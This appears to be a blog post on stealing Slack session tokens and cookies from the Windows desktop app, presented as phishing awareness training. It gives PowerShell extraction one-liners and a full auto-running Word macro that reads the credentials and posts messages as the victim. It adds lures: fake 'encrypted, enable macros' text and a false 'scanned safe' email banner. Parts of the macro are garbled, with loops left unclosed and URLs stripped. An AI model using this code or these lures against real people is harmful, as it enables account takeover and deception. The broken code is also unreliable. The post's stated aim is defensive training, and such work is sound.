Slack (and other Electron apps) often use cookies to store session/access tokens. Perhaps we can extract and use these tokens for something?

Thanks to loca1gh0s7 who gave me this idea!

Extracting the tokens

Slack stores the token in local storage, and after a lot of trial and error I managed to extract the token using PowerShell and this regex:

[regex]::match((Select-String -Pattern "token" "$env:AppData\Slack\Local Storage\leveldb\*.ldb"), '("name":)(.+)(token":")([0-9a-zA-Z-]+)').Groups[4].Value

If successful, you should see a token starting with xoxc.

But we also need the session cookie (with the cryptic name d), which we can get using this:

[regex]::match((Select-String -Pattern ".slack.comd" -Context 0, 0 $env:AppData\Slack\Cookies), '(slack.comd)([a-zA-Z0-9%]+)/').Groups[2].Value

Testing if we can use it

To quickly test if we can use this, we can use this script:

$token = [regex]::match((Select-String -Pattern "token" "$env:AppData\Slack\Local Storage\leveldb\*.ldb"), '("name":)(.+)(token":")([0-9a-zA-Z-]+)').Groups[4].Value
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$cookie = New-Object System.Net.Cookie
$cookie.Name = "d"
$cookie.Value = [regex]::match((Select-String -Pattern ".slack.comd" -Context 0, 0 $env:AppData\Slack\Cookies), '(slack.comd)([a-zA-Z0-9%]+)/').Groups[2].Value
$cookie.Domain = ""
Invoke-WebRequest -Uri "[CHANNELID]&text=Evil%20message&pretty=1&token=$token"-Method GET -WebSession $session

Note that you will need to replace the channel-ID with the channel-ID you want to send a message to.

If successful, you should see a message posted by you in that channel.

Let’s use this for awareness training

That was fun, but let’s do something useful!

We can do pretty much everything with the token/cookie, but for the purpose of awareness training, we can use it to send a message telling the user to stop running attachments from emails.

Let’s use this scenario: we want to demonstrate the dangers of opening malicious documents. To achieve this, we use a Word document.

Create a new macro for the document, and add the following payload:

Const TEAM As String = ""
Const SELF_MESSAGE As String = "I should really stop running macros in unknown documents, next time it might not be this fun"
Const SLACKBOT_MESSAGE As String = "remind me to don't run macros in unknown documents again in 1 minute"
Const REPORTING_URL As String = ""

Private Sub Document_open()
    On Error GoTo 0

    #If Mac Then
        MsgBox SELF_MESSAGE
        ActiveDocument.FollowHyperlink REPORTING_URL
        Exit Sub
    #End If

    Dim levelPth As String
    Dim cookieFilePth As String

    levelPth = Environ$("USERPROFILE") & "\AppData\Roaming\Slack\Local Storage\leveldb\"
    cookieFilePth = Environ$("USERPROFILE") & "\AppData\Roaming\Slack\Cookies"

    Dim leveldbFile As String
    Dim token As String

    leveldbFile = Dir(levelPth & "*.ldb")
    Do Until leveldbFile = ""
        token = token & FindToken(levelPth & leveldbFile)
        If token = "" Then
            leveldbFile = Dir
            leveldbFile = ""
        End If

    Dim cookie As String
    cookie = StealCookie(cookieFilePth)

    Dim channel As String
    channel = GetChannelId(token, cookie, "self")
    SendMessage token, cookie, channel, SELF_MESSAGE

    channel = GetChannelId(token, cookie, "USLACKBOT")
    SendMessage token, cookie, channel, SLACKBOT_MESSAGE
End Sub

Private Function ExtractRegex(text, pattern, index)
    On Error GoTo 0

    Dim regex As Object
    Set regex = New RegExp

    regex.pattern = pattern
    regex.Global = True
    regex.ignorecase = True

    Dim matches As Object
    Set matches = regex.Execute(text)

    For Each Match In matches
        ExtractRegex = Match.SubMatches.Item(index)
End Function

Private Function FindToken(file)
    On Error GoTo 0

    Dim fileContent As String
    fileContent = ReadFile(file)

    FindToken = ExtractRegex(fileContent, "(" & TEAM & ")(.+)(token"":"")([0-9a-zA-Z-]+)", 3)
End Function

Private Function StealCookie(file)
    On Error GoTo 0

    Dim fileContent As String
    fileContent = ReadFile(file)

    StealCookie = ExtractRegex(fileContent, "(slack.comd)([a-zA-Z0-9%]+)/", 1)
End Function

Private Function ReadFile(filePath)
    On Error GoTo 0

    Dim MyData As String, strData() As String
    Dim i As Long

    Open filePath For Binary As #1
    MyData = space$(LOF(1))
    Get #1, , MyData
    Close #1
    strData() = Split(MyData, vbCrLf)

    For i = LBound(strData) To UBound(strData)
        ReadFile = ReadFile & strData(i)
    Next i
End Function

Private Function GetChannelId(token, cookie, user)
    On Error GoTo 0

    Dim cookies As String
    cookies = "d=" & cookie

    Dim response As String

    If user = "self" Then
        response = XmlHttpRequest("POST", "https://" & TEAM & "" & token, cookies, "")
        GetChannelId = ExtractRegex(response, "(""user_id"":"")([a-zA-Z0-9-+@.]+)("")", 1)
        response = XmlHttpRequest("GET", "https://" & TEAM & "" & user & "&text=" & URLEncode(message) & "&pretty=0&token=" & token, cookies, "")
        GetChannelId = ExtractRegex(response, "(""id"":"")([a-zA-Z0-9]+)("")", 1)
    End If
End Function

Private Function SendMessage(token, cookie, channel, message)
    On Error GoTo 0

    Dim cookies As String
    cookies = "d=" & cookie

    Dim sUrl
    sUrl = "https://" & TEAM & "" & channel & "&text=" & URLEncode(message) & "&pretty=1&token=" & token
    XmlHttpRequest "GET", sUrl, cookies, ""
End Function

Private Function XmlHttpRequest(sMethod, sUrl, sCookies, payload)
    On Error GoTo 0

    With CreateObject("WinHttp.WinHttpRequest.5.1")
        .Open sMethod, sUrl, False
        .setRequestHeader "Cookie", sCookies
        .setRequestHeader "Content-type", "application/x-www-form-urlencoded"
        .send payload
        .waitForResponse 4000
        XmlHttpRequest = .responseText
    End With
End Function

Private Function URLEncode( _
   ByVal StringVal As String, _
   Optional SpaceAsPlus As Boolean = False _
) As String
    On Error GoTo 0

    Dim bytes() As Byte, b As Byte, i As Integer, space As String

    If SpaceAsPlus Then space = "+" Else space = "%20"

    If Len(StringVal) > 0 Then
        With New ADODB.Stream
            .Mode = adModeReadWrite
            .Type = adTypeText
            .Charset = "UTF-8"
            .WriteText StringVal
            .Position = 0
            .Type = adTypeBinary
            .Position = 3 ' skip BOM
            bytes = .Read
        End With

        ReDim Result(UBound(bytes)) As String

        For i = UBound(bytes) To 0 Step -1
            b = bytes(i)
            Select Case b
                Case 97 To 122, 65 To 90, 48 To 57, 45, 46, 95, 126
                    Result(i) = Chr(b)
                Case 32
                    Result(i) = space
                Case 0 To 15
                    Result(i) = "%0" & Hex(b)
                Case Else
                    Result(i) = "%" & Hex(b)
            End Select
        Next i

        URLEncode = Join(Result, "")
        End If
End Function

Make sure you add this to ThisDocument:

Modify the constants as needed:

  • TEAM = your team Slack-subdomain
  • SELF_MESSAGE = message that will be sent to the user (from the user)
  • SLACKBOT_MESSAGE = message that will be sent to Slackbot (from the user)
  • REPORTING_URL = your company’s security incident reporting URL

Note that this payload only works on Windows, it will simply present a dialog box telling the user to report this using the reporting URL when the document is opened on Mac.

You will also need to add the following references (Tools -> References):

  • Microsoft ActiveX Data Objects 6.1 Library
  • Microsoft VBScript Regular Expressions 5.5

This should give you a document that will run the payload when opened, stealing the token and sending one message to the user and one to Slackbot.

To make the macro work, we have to save it as a legacy document, using the Word 97-2003 Document (.doc) format

Making it better

To make the document more believable, let’s add some junk to it, and a note that says it’s encrypted and need macros to be decrypted.

Slackbot response

We can also add a custom Slackbot response to make Slackbot respond to the message sent to the user from the user. This will trigger an instant notification, alerting the user that something has happened (which is what we want to do).

Email it

You can deliver this any way you want, like via email and a nice banner stating that the attachment has been scanned and found safe to execute.

Why this works

The payload above doesn’t exploit a single vulnerability, yet it can allow us to take full control over the Slack accounts logged in on the machine.

This is a combination of weakness in the way cookies and local storage is stored, and the fact that we trick the user into executing this code locally.

We could use the exact same trick to extract tokens from Teams, Chrome or any other Chromium/Electron client.

Why this doesn’t work on MacOS

The payload doesn’t work on MacOS because the MacOS sandbox restrict access to the file system. Sandbox escape is out of scope for a simple phishing awareness exercise.